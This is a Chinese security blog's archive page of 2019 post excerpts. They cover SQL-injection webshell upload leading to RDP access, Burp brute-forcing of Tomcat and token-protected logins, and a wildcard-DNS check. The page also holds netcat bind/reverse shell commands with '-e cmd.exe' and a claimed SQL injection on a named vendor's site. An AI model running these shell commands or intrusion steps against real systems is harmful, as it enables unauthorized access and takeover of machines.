08 2019 档案
模拟sql注入实现远程桌面登录
摘要:首先用sql注入文件命令y url+一句话 into outfile 绝对路径/test.php 用蚁剑连接打开连接的终端 先看用户的权限 创建一个用户将它放入队列中 查看3389端口是否开启 0xd3d 16进制解码为3389 打开远程桌面连接输入新建的用户和密码 成功远程桌面连接 阅读全文
posted @ 2019-08-26 20:42 Lmos 阅读(673) 评论(0) 推荐(0)
用burp爆破tomcat的过程
摘要:首先burp抓包,将抓到的包放到intruder中 通过burp中自带的解码得知账号密码中有个“:“号 所以我们选择的数据类型为Custom iterator 第二条输入”:“ 将字典编码了对应爆破 因为爆破的时候会将字符URL编码了,所以需要将那个选项去掉 完成 爆破 这里调整可爆破MD5加密的。 阅读全文
posted @ 2019-08-20 11:55 Lmos 阅读(2412) 评论(0) 推荐(0)
nc监控实现调用受害者cmd
摘要:正向连接 受害者 IP 是直接暴漏在公网的 或者你们同属于一个内网 受害者:nc.exe -vlp 1234 -e cmd.exe 攻击者 nc 192.168.1.1 1234 nc -lvvp 80 直接监听内网所有主机80端口 反向连接 受害者 A 出于内网状态 192.168.1.25 攻击 阅读全文
posted @ 2019-08-17 13:08 Lmos 阅读(505) 评论(0) 推荐(0)
用php简单区别泛解析
摘要:<?php header('content-type:text/html; charset=utf-8'); $host = '58.com'; $hosts = gethostbyname('fuckfuck.'.$host) if ($hosts != 'fuckfuck.'.$host){ f 阅读全文
posted @ 2019-08-14 20:24 Lmos 阅读(359) 评论(0) 推荐(0)
burp中获取token进行暴力破解
摘要:选中线程设成1 阅读全文
posted @ 2019-08-13 18:06 Lmos 阅读(1041) 评论(1) 推荐(0)
某毒霸网站存在信息泄露和sql注入
摘要:通过钟馗之眼搜索目标网站的证书使用者找到信息泄露的网站, 点击上图中的edit会跳转 手工注入sql发现有效 that's all 阅读全文
posted @ 2019-08-12 17:59 Lmos 阅读(188) 评论(0) 推荐(0)